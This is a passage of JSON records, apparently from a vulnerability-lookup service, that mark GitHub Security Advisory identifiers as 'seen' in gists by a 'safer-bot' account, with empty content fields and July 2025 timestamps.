"https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "4e65ead3-2147-40e7-bd86-b10739863104", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "e7025bba-a27d-4d1a-b73d-8e67c7e75a4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "eb10ef18-df37-4610-83a3-4d2d921f04aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "b51c38cc-57b5-44fc-ab5b-d6cf3e443a36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmfg-rjjm-rjrj", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "30109975-c123-42d9-837f-ccaf79242e2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "347b8313-8230-494d-b9d8-06dc34a3f5e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/9e275914081f1451fb7c285908b92354", "content": "", "creation_timestamp": "2025-07-16T15:36:15.000000Z"}, {"uuid": "7e208f12-0f83-4f0a-a12a-bfe448901362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/6007ab4bc96b7ca0603fd4e9d504510a", "content": "", "creation_timestamp": "2025-07-16T15:39:31.000000Z"}, {"uuid": "7dbd303a-7172-4094-8561-28842317f206", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/6007ab4bc96b7ca0603fd4e9d504510a", "content": "", "creation_timestamp": "2025-07-16T15:39:31.000000Z"}, {"uuid": "18cb796d-6fcc-495f-9f9a-e404149f08d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/6007ab4bc96b7ca0603fd4e9d504510a", "content": "", "creation_timestamp": "2025-07-16T15:39:31.000000Z"}, {"uuid": "3040fc30-124f-4af3-9f1c-bb1be1cac344", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/6007ab4bc96b7ca0603fd4e9d504510a", "content": "", "creation_timestamp": "2025-07-16T15:39:31.000000Z"}, {"uuid": "a579dc1e-c0c2-4ce1-9026-e0631b014cfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/6007ab4bc96b7ca0603fd4e9d504510a", "content": "", "creation_timestamp": "2025-07-16T15:39:31.000000Z"}, {"uuid": "1def8876-ad32-4563-a978-88e03cc6d93f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/48d976dcf4ea7f2f8a5125c3eb9994b7", "content": "", "creation_timestamp": "2025-07-16T15:38:59.000000Z"}, {"uuid": "38123faa-996a-4414-9ad8-74fe103b62bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/070d3c079f471f54fa0350fc9974b0f0", "content": "", "creation_timestamp": "2025-07-16T15:43:47.000000Z"}, {"uuid": "2d14953d-997b-4440-a8e8-20719d202ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/070d3c079f471f54fa0350fc9974b0f0", "content": "", "creation_timestamp": "2025-07-16T15:43:47.000000Z"}, {"uuid": "8049d0ba-247c-4f12-8b52-536ed43e71d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/070d3c079f471f54fa0350fc9974b0f0", "content": "", "creation_timestamp": "2025-07-16T15:43:47.000000Z"}, {"uuid": "907671d0-0f5e-4402-8df5-4ff7ce3ff3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/070d3c079f471f54fa0350fc9974b0f0", "content": "", "creation_timestamp": "2025-07-16T15:43:47.000000Z"}, {"uuid": "41803c64-728f-4e44-8ded-364cef286842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-889j-63jv-qhr8", "type": "seen", "source": "https://gist.github.com/safer-bot/070d3c079f471f54fa0350fc9974b0f0", "content": "", "creation_timestamp": "2025-07-16T15:43:47.000000Z"}, {"uuid": "e9499172-32a1-409e-b952-26df682b811d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/0c1f717b506f557eb28601bb3267ff7e", "content": "", "creation_timestamp": "2025-07-16T15:43:15.000000Z"}, {"uuid": "263cfd6c-ac2f-4c66-9fc9-6ed7901719f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/e18476fb270ed58adfacbc476e922e90", "content": "", "creation_timestamp": "2025-07-16T15:45:54.000000Z"}, {"uuid": "ad32a04b-52bf-4041-a0fb-79a7741f39c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "1419cd28-b715-4848-ad7c-9b60752a221d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "126e0d30-e3d7-4c63-bdf2-61f62800e5ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "445f5684-28e4-4e6b-b79c-c32bcc7eef17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "cae7ae6f-90e1-40ba-aede-fa12a371cf4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "ae9b4604-98c7-450c-a88c-fa77bea3176b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/7849638fcda472a237d0b9bb8359fd4c", "content": "", "creation_timestamp": "2025-07-16T22:03:25.000000Z"}, {"uuid": "20c641cd-5018-475a-bcc0-94c4a6c5fb48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/405fbfe372a1ddd7c00c6a061fa1be50", "content": "", "creation_timestamp": "2025-07-16T22:11:59.000000Z"}, {"uuid": "950bd1fc-70b5-405e-adc6-8c30e26d057b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/405fbfe372a1ddd7c00c6a061fa1be50", "content": "", "creation_timestamp": "2025-07-16T22:11:59.000000Z"}, {"uuid": "7db3dfab-b862-43ae-aca9-4cbfc7a03448", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/405fbfe372a1ddd7c00c6a061fa1be50", "content": "", "creation_timestamp": "2025-07-16T22:11:59.000000Z"}, {"uuid": "6e0a05c4-98b6-4293-9ca0-bc86dc76e862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/405fbfe372a1ddd7c00c6a061fa1be50", "content": "", "creation_timestamp": "2025-07-16T22:11:59.000000Z"}, {"uuid": "fe6290ca-4994-45ac-9ee1-b6d5ef7aab6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/12811596e1fce29d1d4178b5b5dac213", "content": "", "creation_timestamp": "2025-07-16T22:13:53.000000Z"}, {"uuid": "08c2f580-329f-4ae8-9cd9-e22853e306af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/12811596e1fce29d1d4178b5b5dac213", "content": "", "creation_timestamp": "2025-07-16T22:13:53.000000Z"}, {"uuid": "c1f88070-a204-41b5-862d-d6f186ba5778", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73xv-w5gp-frxh", "type": "seen", "source": "https://gist.github.com/safer-bot/12811596e1fce29d1d4178b5b5dac213", "content": "", "creation_timestamp": "2025-07-16T22:13:53.000000Z"}, {"uuid": "a15dad5f-0585-463a-bd7b-92de05bd62d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/12811596e1fce29d1d4178b5b5dac213", "content": "", "creation_timestamp": "2025-07-16T22:13:53.000000Z"}, {"uuid": "6037f3e8-b851-48d4-8808-63c578261575", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6xx3-rg99-gc3p", "type": "seen", "source": "https://gist.github.com/safer-bot/12811596e1fce29d1d4178b5b5dac213", "content": "", "creation_timestamp": "2025-07-16T22:13:53.000000Z"}, {"uuid": "8bf40ca4-f032-4681-87b0-7a176bc4e5d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/12811596e1fce29d1d4178b5b5dac213", "content": "", "creation_timestamp": "2025-07-16T22:13:53.000000Z"}, {"uuid": "d932de5a-baa3-42dc-aa3e-3c8e1b297051", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/12811596e1fce29d1d4178b5b5dac213", "content": "", "creation_timestamp": "2025-07-16T22:13:53.000000Z"}, {"uuid": "bbd70cd4-283d-4cce-95ff-37233074870c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/b59db3ffc7bd8e41644f9d7761238f5c", "content": "", "creation_timestamp": "2025-07-16T22:18:28.000000Z"}, {"uuid": "532e6494-af72-4d26-b86b-0a1d4ff00125", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/b59db3ffc7bd8e41644f9d7761238f5c", "content": "", "creation_timestamp": "2025-07-16T22:18:28.000000Z"}, {"uuid": "797c2eb3-1366-4191-9c00-b95e5d1049b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a2eac4f0aaf202fcb21e13e83179f94b", "content": "", "creation_timestamp": "2025-07-16T22:21:16.000000Z"}, {"uuid": "f99df7d9-b919-4213-a5fa-a80282c1388b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-599f-7c49-w659", "type": "seen", "source": "https://gist.github.com/safer-bot/88625ab0bb571dfc453743d37cd6445b", "content": "", "creation_timestamp": "2025-07-16T22:23:53.000000Z"}, {"uuid": "59d942a1-26ca-4ddc-82fc-46043608cda0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/a61c31b69fd80863cfc394b0845da3a9", "content": "", "creation_timestamp": "2025-07-16T22:27:17.000000Z"}, {"uuid": "7438742e-2cf1-4b37-bc1a-4310c38237e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/a61c31b69fd80863cfc394b0845da3a9", "content": "", "creation_timestamp": "2025-07-16T22:27:17.000000Z"}, {"uuid": "15226c6c-86d8-481f-a20e-0296bb621f67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/a61c31b69fd80863cfc394b0845da3a9", "content": "", "creation_timestamp": "2025-07-16T22:27:17.000000Z"}, {"uuid": "9678410f-ad0f-40e7-afe7-a090624dadc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/a61c31b69fd80863cfc394b0845da3a9", "content": "", "creation_timestamp": "2025-07-16T22:27:17.000000Z"}, {"uuid": "4865d509-5582-4440-87ad-c7bff30d2366", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/a61c31b69fd80863cfc394b0845da3a9", "content": "", "creation_timestamp": "2025-07-16T22:27:17.000000Z"}, {"uuid": "15c676e5-112f-4ee8-8ccd-4f6566a7955d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/65f058db4122037a81a2e0e4542c4b27", "content": "", "creation_timestamp": "2025-07-16T22:28:22.000000Z"}, {"uuid": "66715116-31eb-4403-a74d-415082f96c45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/616a34b49dda3c4e923c20ea35cb8f78", "content": "", "creation_timestamp": "2025-07-16T22:31:19.000000Z"}, {"uuid": "7eae7dfe-7c11-4838-a306-7ee667074fdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/616a34b49dda3c4e923c20ea35cb8f78", "content": "", "creation_timestamp": "2025-07-16T22:31:19.000000Z"}, {"uuid": "0426cb08-2717-4063-b3a6-09010c595d40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/616a34b49dda3c4e923c20ea35cb8f78", "content": "", "creation_timestamp": "2025-07-16T22:31:19.000000Z"}, {"uuid": "332539b9-2532-4493-a369-774ff5e6451b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/616a34b49dda3c4e923c20ea35cb8f78", "content": "", "creation_timestamp": "2025-07-16T22:31:19.000000Z"}, {"uuid": "ce985454-b0f5-4e23-bccd-ed87b6b3e63c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/3989825d9d9878257b58739254a4edfe", "content": "", "creation_timestamp": "2025-07-16T22:30:47.000000Z"}, {"uuid": "f78512c0-ab66-450d-989b-0719e8261239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/3989825d9d9878257b58739254a4edfe", "content": "", "creation_timestamp": "2025-07-16T22:30:47.000000Z"}, {"uuid": "e73d5b71-95fa-4b7a-bf50-27bafaf2a1c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/3989825d9d9878257b58739254a4edfe", "content": "", "creation_timestamp": "2025-07-16T22:30:47.000000Z"}, {"uuid": "354d2486-7af0-4941-99e4-9118a185f75d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/3989825d9d9878257b58739254a4edfe", "content": "", "creation_timestamp": "2025-07-16T22:30:47.000000Z"}, {"uuid": "6abdd2da-7bd4-4013-a6a4-ffdf37408fbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/3989825d9d9878257b58739254a4edfe", "content": "", "creation_timestamp": "2025-07-16T22:30:47.000000Z"}, {"uuid": "a0ca28e7-c736-4522-8b43-31aa6350c252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/3989825d9d9878257b58739254a4edfe", "content": "", "creation_timestamp": "2025-07-16T22:30:47.000000Z"}, {"uuid": "f9afd208-4bf1-41c0-b9ad-1ac60c831676", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/eed637d8b79397eaf6eed3f0d9849154", "content": "", "creation_timestamp": "2025-07-16T22:30:16.000000Z"}, {"uuid": "f8b7a20d-5fe3-47e7-85d5-a699f3c85a90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/4dc1ecb9c56e3a6b3b01986d7ee10fa7", "content": "", "creation_timestamp": "2025-07-16T22:34:25.000000Z"}, {"uuid": "a125914c-ef86-4ae8-ab90-6a51beb318ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/4dc1ecb9c56e3a6b3b01986d7ee10fa7", "content": "", "creation_timestamp": "2025-07-16T22:34:25.000000Z"}, {"uuid": "b292ec3f-49d6-4640-a4d3-3fcde03fad92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73xv-w5gp-frxh", "type": "seen", "source": "https://gist.github.com/safer-bot/4dc1ecb9c56e3a6b3b01986d7ee10fa7", "content": "", "creation_timestamp": "2025-07-16T22:34:25.000000Z"}, {"uuid": "eb9fafaa-c797-4046-b03f-3cab77fd5334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/4dc1ecb9c56e3a6b3b01986d7ee10fa7", "content": "", "creation_timestamp": "2025-07-16T22:34:25.000000Z"}, {"uuid": "4f58f36b-dba8-402c-ac52-caf8bd042f89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6xx3-rg99-gc3p", "type": "seen", "source": "https://gist.github.com/safer-bot/4dc1ecb9c56e3a6b3b01986d7ee10fa7", "content": "", "creation_timestamp": "2025-07-16T22:34:25.000000Z"}, {"uuid": "a7839eef-1cdf-4d90-bc00-028ca68ac897", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "9b64ca0a-d348-4953-9ae2-0547da65e69f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "690bc908-6e3c-4c7d-a7b8-2e492f8cd867", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "15a7428f-68fd-45d0-a743-23399a107fae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "a3509c8c-c0b1-408f-b3da-5651465682b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/2d6a7248bf073124cafd08649d475f0a", "content": "", "creation_timestamp": "2025-07-16T15:54:18.000000Z"}, {"uuid": "b8587008-f598-4494-a374-5d710ee0d571", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/6fe1168bf950f9df3a2fbb2dd8ad1cc6", "content": "", "creation_timestamp": "2025-07-16T16:01:16.000000Z"}, {"uuid": "eabf45c8-9d2d-4c87-b855-f22abd0bfd12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/6fe1168bf950f9df3a2fbb2dd8ad1cc6", "content": "", "creation_timestamp": "2025-07-16T16:01:16.000000Z"}, {"uuid": "8eca5a65-1bda-4e21-a94e-147b34ee7cef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/6fe1168bf950f9df3a2fbb2dd8ad1cc6", "content": "", "creation_timestamp": "2025-07-16T16:01:16.000000Z"}, 